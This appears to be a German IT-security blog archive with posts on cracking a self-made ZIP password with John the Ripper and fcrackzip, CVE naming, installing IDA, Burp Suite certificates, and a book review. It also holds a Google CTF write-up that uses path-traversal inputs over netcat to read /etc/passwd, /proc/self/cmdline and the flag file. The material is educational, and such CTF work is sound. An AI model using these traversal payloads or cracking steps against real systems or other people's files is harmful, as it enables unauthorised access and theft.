Passwort einer ZIP Datei mit John the Ripper knacken

2018-08-12 von admin

Mit der Software John the Ripper ist es ebenfalls möglich, ein vergessenes Passwort in Erfahrung zu bringen.

Installation der Software

git clone https://github.com/magnumripper/JohnTheRipper

Danach in den Ordner wechseln.

cd JohnTheRipper/src

Als nächstes

./configure
make clean
make

ausführen. Daraufhin wird die Software gebaut und ist unter „JohnTheRipper/run“ zu finden.

Konstruktion eines Beispiels

1. Erstellen einer Textdatei mit dem Namen „Geheim.txt“ und Eingabe eines Geheimtextes.

2. Mit dem Befehl zip die Textdatei packen und das Passwort „123456“ vergeben.

zip -e -o Geheim.zip Geheim.txt

Parameter Beschreibung
e Verschlüsseln
o Name der Zip Datei

 

3. Prüfen, ob das vergebene Passwort funktioniert. Dafür die Datei entpacken und einmal das richtige und einmal das falsche Passwort eingeben.

unzip Geheim.zip

4. Mit dem Programm „zip2john“ den Passworthash aus der ZIP Datei auslesen und in eine Datei speichern.

./run/zip2john /tmp/Geheim.zip > /tmp/hash.txt

5. Mit John the Ripper und einer Wörterliste werden Hashes generiert und verglichen, bis das Passwort gefunden ist.

./run/john --format=PKZIP --wordlist=/tmp/numbers.txt hash.txt

 

Download von Wortlisten

https://github.com/danielmiessler/SecLists/tree/master/Passwords

https://wiki.skullsecurity.org/Passwords

https://packetstormsecurity.com/Crackers/wordlists/

http://www.md5this.com/tools/wordlists.html

https://weakpass.com

http://ftp.icm.edu.pl/packages/wordlists/

http://download.openwall.net/pub/wordlists/

Kategorie: IT-Security Schlagwörter: ,

Common Vulnerabilities and Exposures (CVE)

2018-08-04 von admin

Common Vulnerabilities and Exposures, kurz CVE genannt, ist ein Industriestandard für Namenskonvention von Sicherheitslücken. Dadurch wird eine eindeutige Identifizierung und ein Informationsaustausch einer Schwachstelle gewährleistet.

Die Liste der CVEs wird von der Non-Profit-Organization „MITRE Corporation“ in Zusammenarbeit mit Sicherheitsexperten, Bildungseinrichtungen, Behörden und Herstellern von Sicherheitssoftware (CVE Numbering Authorities) verwaltet.

CVE Nummern werden auch häufig als CVE names, CVE numbers, CVE-IDs und CVEs bezeichnet.

 

Aufbau einer CVE Nummer

CVE-YYYY-NNNN
Parameter Beschreibung
CVE Prefix
YYYY Jahresangabe
NNNN fortlaufende Nummer

 

Von 1999 bis 2013 waren die fortlaufenden Nummern immer vierstellig (mit führender 0). Seit 2014 kann die fortlaufende Nummer beliebig lang sein, aber mindestens vier Stellen.

 

Links

Link Beschreibung
https://www.cvedetails.com Webinterface zur Suche von CVEs und Detailinformationen
http://cve.mitre.org/data/downloads/index.html Download aller CVEs

 

Kategorie: IT-Security

Passwort einer ZIP Datei mit fcrackzip knacken

2018-07-29 von admin

Mit der Software fcrackzip ist es unter Linux möglich, ein vergessenes Passwort, unter Anwendung der Brute-Force-Methode, zu knacken. Die Installation der Software kann wie folgt durchgeführt werden:

apt-get install fcrackzip

 

Konstruktion eines Beispiels

1. Erstellen einer Textdatei mit dem Namen „Geheim.txt“ und Eingabe eines Geheimtextes.

2. Mit dem Befehl zip die Textdatei packen und das Passwort „123456“ vergeben.

zip -e -o Geheim.zip Geheim.txt

Parameter Beschreibung
e Verschlüsseln
o Name der Zip Datei

 

3. Prüfen, ob das vergebene Passwort funktioniert. Dafür die Datei entpacken und einmal das richtige und einmal das falsche Passwort eingeben.

unzip Geheim.zip

4. Mit dem Programm fcrackzip die Datei „Geheim.zip“ knacken

fcrackzip -v -l 5-6 -c 1 -u Geheim.zip

Parameter Beschreibung
v Anzeige von Detailinformationen
l Angabe der Passwortlänge min. bis max. (5-6)
c Verwendung des Zeichensatzes, wobei „1“ für Zahlen zwischen 0 bis 9 steht
u Verwendung der Software unzip, um falsche Passwörter auszusortieren

 

Kategorie: IT-Security Schlagwörter:

Ubuntu: IDA Installieren

2018-07-14 von admin

Die Software IDA ist ein Disassembler, mit der Binärcode in Assemblersprache umgewandelt werden kann.

Schritt 1: Download IDA

Unter www.hex-rays.com kann die Software heruntergeladen werden.

Schritt 2: Installieren

Nach dem Download eine Konsole öffen und in den entsprechenden Order navigieren. Daraufhin der Datei die Ausführungsrechte vergeben.

chmod +x idafree70_linux.run

Starten der Installation.

sudo ./idafree70_linux.run

Schritt 3 (Optional): Symlink erstellen

Mit der Vergabe eine Symlinks ist die Software Systemweit aufrufbar.

sudo ln -s /opt/idafree-7.0/ida64 /usr/bin/
Kategorie: IT Schlagwörter:

Google CTF – Beginners Quest – ADMIN UI

2018-07-07 von admin

Google veranstaltet regelmäßig Capture the Flags (CTF). Ziel eines CTF-Spiels ist es, eine Schwachstelle zu finden, diese auszunutzen und ein „Flag“ in Erfahrung zu bringen. Das Flag ist meist ein Text mit einer definierten Struktur, mit dem Punkte eingelöst werden. Das Team mit den meisten Punkten gewinnt das Spiel.

 

Challenge „Beginners Quest – ADMIN UI“

 

Analyse

Als erstes auf der Konsole mit der Software Netcat eine Verbindung aufbauen.

nc mngmnt-iface.ctfcompetition.com 1337

Dadurch wird eine Verbindung zum Server aufgebaut und automatisch wird ein Programm gestartet, welches auf diesem läuft. Das Programm bietet folgende Funktionen über ein Menü an:

=== Management Interface ===
 1) Service access
 2) Read EULA/patch notes
 3) Quit

 

Bei der Option „1“ wird ein Passwort verlangt, welches wir nicht haben, also wieder zurück.

Please enter the backdoo^Wservice password:

Die Option „2“ stellt ein weiteres Menü bereit:

The following patchnotes were found:
 - Version0.3
 - Version0.2
Which patchnotes should be shown?

 

Mit der Eingabe „Version0.3“ erhalten wir die Patchnotes:

# Version 0.3
- Rollback of version 0.2 because of random reasons
- Blah Blah
- Fix random reboots at 2:32 every second Friday when it's new-moon.

Mit der Eingabe „Version0.2“ erhalten wir die Patchnotes:

# Release 0.2
- Updated library X to version 0.Y
- Fixed path traversal bug
- Improved the UX

 

Let’s go hacking

Bis hierhin kein Problem, wir haben eine Software, die auf einem Server läuft, eine Passworteingabe verlangt, Patchnotes bereitstellt und sich beenden lässt.

Als erstes habe ich ein paar nicht zulässige Eingaben ausprobiert. D.h., anstatt die im Menü vorgegebenen Eingaben habe ich Menüpunkt „4“, „0“, … usw. ausprobiert. Was keinen Erfolg brachte.

 

Als nächstes habe ich im Untermenü der Patchnotes invalide Eingaben ausprobiert. Folgende Fehlermeldung kam zum Vorschein:

Error: No such file or directory

Daraus lässt sich schließen, dass wahrscheinlich die Patchnotes in Dateien abgelegt sind und das Programm diese öffnet und entsprechend anzeigt.

 

Durch einen einfachen Test lässt sich herauszufinden, ob das Programm nur den „Dateinamen“ oder „Pfad/Dateinamen“ zum Öffnen benötigt. Im Untermenü wird folgendes eingegeben:

./Version0.3

Daraufhin wird die Datei Version 0.3 angezeigt.

# Version 0.3
 - Rollback of version 0.2 because of random reasons
 - Blah Blah
 - Fix random reboots at 2:32 every second Friday when it's new-moon.

Bingo ! :) D.h. über die Eingabe ist es möglich, einen Pfad (Path Traversel) anzugeben. Zur Verdeutlichung, was dadurch jetzt möglich ist:

../../../../../../etc/passwd

Ausgabe

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/syn
...

Leider haben wir das Flag noch nicht gefunden und es kann sich überall auf dem Server befinden.

 

Weitere Informationsbeschaffung

Unter Linux ist es möglich, sich den aktuell laufenden Prozess anzeigen zu lassen. Mittels

/proc/self/cmdline

wird der aktuelle Prozess angezeigt.

  1. Verbinden mit Netcat
  2. Menüpunkt „2“ aufrufen
  3. Folgende Eingabe durchführen
../../../../../../../../../../proc/self/cmdline

Ausgabe

./main=== Management Interface ===
1) Service access
2) Read EULA/patch notes
3) Quit

Der Name der laufenden Applikation lautet „main“.

 

Programm herunterladen

Auf folgende Art und Weise kann das Programm jetzt vom Server heruntergeladen werden.

echo -e "2\n../main" | nc -v mngmnt-iface.ctfcompetition.com 1337 > admin_ui_file
Befehl/Argument Beschreibung
echo Der Befehl „echo“ gibt einen Text aus.
e Der Parameter „e“ sorgt dafür, dass das Sonderzeichen „\n“ interpretiert wird (Enter/Newline).
| Mit der Pipe „|“ wird die Ausgabe an das Programm Netcat übergeben, welches sich zum Server verbindet.
> Mit „>“ werden alle Ausgaben in eine Datei „admin_ui_file“ gespeichert.

 

Nach ca. 10 Sekunden mit „STRG + C“ den Prozess abbrechen. Lokal sollte jetzt eine Datei vorhanden sein. Der manuelle Abbruch ist notwendig, da die Datei sonst immer weiter wächst. Das Warten auf eine Eingabe auf Seiten des Servers wird ebenfalls in die Datei gespeichert…

 

Reverse Engineering

Die Datei mit einem Hex-Editor (Bless) öffnen und nach Texten suchen, die hilfreich sein können.

Mit dem String „patchnotes“ ergab die Suche einen interessanten Treffer.

Final Step

Im Ordner „patchnotes“ liegt eine Datei mit dem Namen „flag“, welche es gilt anzuschauen. Also, auf eine Neues und mit dem Server verbinden, den Menüpunkt „2“ wählen und bei der Eingabe „Which patchnotes should be shown?“:

../flag

eingeben. Als Ausgabe erhalten wir unser Flag. :)

CTF{I_luv_buggy_sOFtware}=== Management Interface ===
1) Service access
2) Read EULA/patch notes
3) Quit

 

Kategorie: IT-Security Schlagwörter: , ,

Rezension: Flachsinn: Ich habe Hirn, ich will hier raus

2018-06-23 von admin

Autor: Gunter Dueck

Taschenbuch: 262 Seiten

Verlag: Campus Verlag; Auflage: 1 (16. Februar 2017)

Sprache: Deutsch

ISBN-10: 3593505177

ISBN-13: 978-3593505176

Das Buch „Flachsinn“ stellt die fortschreitende Verblödung der Massen anhand von aktuellen Beispielen aus unterschiedlichen Medien dar. Dabei werden alle Fachbegriffe so erklärt, dass auch weniger IT affine Menschen den Darstellungen folgen können. Die gesellschaftlichen Herausforderungen einer zunehmend digitalisierten Welt werden auf intelligente und witzige Weise Stück für Stück zerlegt und beleuchtet. Um ein paar Beispiele zu nennen:

  • das Phänomen der Filterblase
  • Kommentarfunktionen und die daraus entstehende Diskussionskultur
  • die Geilheit auf „Likes“
  • es zählt nur noch Aufmerksamkeit
  • ständig gegen alles sein

 

Besonders hat mir gefallen, dass Herr Dueck sich mit dem Thema Führungskräfte in diesem Zusammenhang ebenfalls auseinander gesetzt hat. Die Idiotie, das Führungskräfte keine Zeit haben und bekommen, Entscheidungen zu treffen, ohne eine ausreichende Auseinandersetzung mit einer Thematik, trifft den Nagel auf den Kopf. Alles muss „schnell, schnell“ gehen…

Das Buch ist ein Appell an die Gesellschaft, endlich aufzuwachsen und etwas zu verändern. Einige Lösungsstrategien werden am Ende des Buches beschrieben.

 

Wertung: lesenswert

Kategorie: Bücher Schlagwörter: ,

Burp Suite – Install CA Certificate in Firefox

2018-06-16 von admin

Um „https“ Verbindungen mit der Burp Suite bearbeiten zu können, wird im Firefox ein Zertifikat benötigt. Dafür sind folgende Schritte durchzuführen:

Schritt 1

Den Browser Firefox starten und das Menü „Bearbeiten – Einstellungen“ aufrufen. Auf dieser Seite bis zu den Einstellungen „Netzwerk Proxy“ scrollen und den „Einstellungen …“ Button klicken.

Danach die Einstellungen für den lokalen Proxy setzen. Der Standard der Burp Suite ist auf dem Screenshot abgebildet. Falls dieser abweicht, muss eine entsprechende Anpassung vorgenommen werden.

Schritt 2

Die Burp Suite starten und im Firefox die Seite „http://burp“ aufrufen.

Jetzt oben rechts auf „CA Certificate“ klicken und das Zertifikat herunterladen.

Schritt 3

Als nächstes im Firefox erneut die Einstellungen aufrufen und unter „Privatsphäre & Sicherheit“ zu den Zertifikaten scrollen. Daraufhin den Button „Zertifikate anzeigen“ klicken.

In dem Dialog „Zertifikate Manager“ kann mittels des Buttons „Importieren“ das eben heruntergeladene Zertifikat dem Firefox hinzugefügt werden.

Schritt 4

Jetzt ist es möglich, „https“ Verbindungen mit der Burp Suite zu bearbeiten. Wenn die Burp Suite nicht mehr benötigt wird, nicht vergessen, die Proxy Verwendung im Firefox entsprechend zu deaktivieren.

Kategorie: IT Schlagwörter: , , ,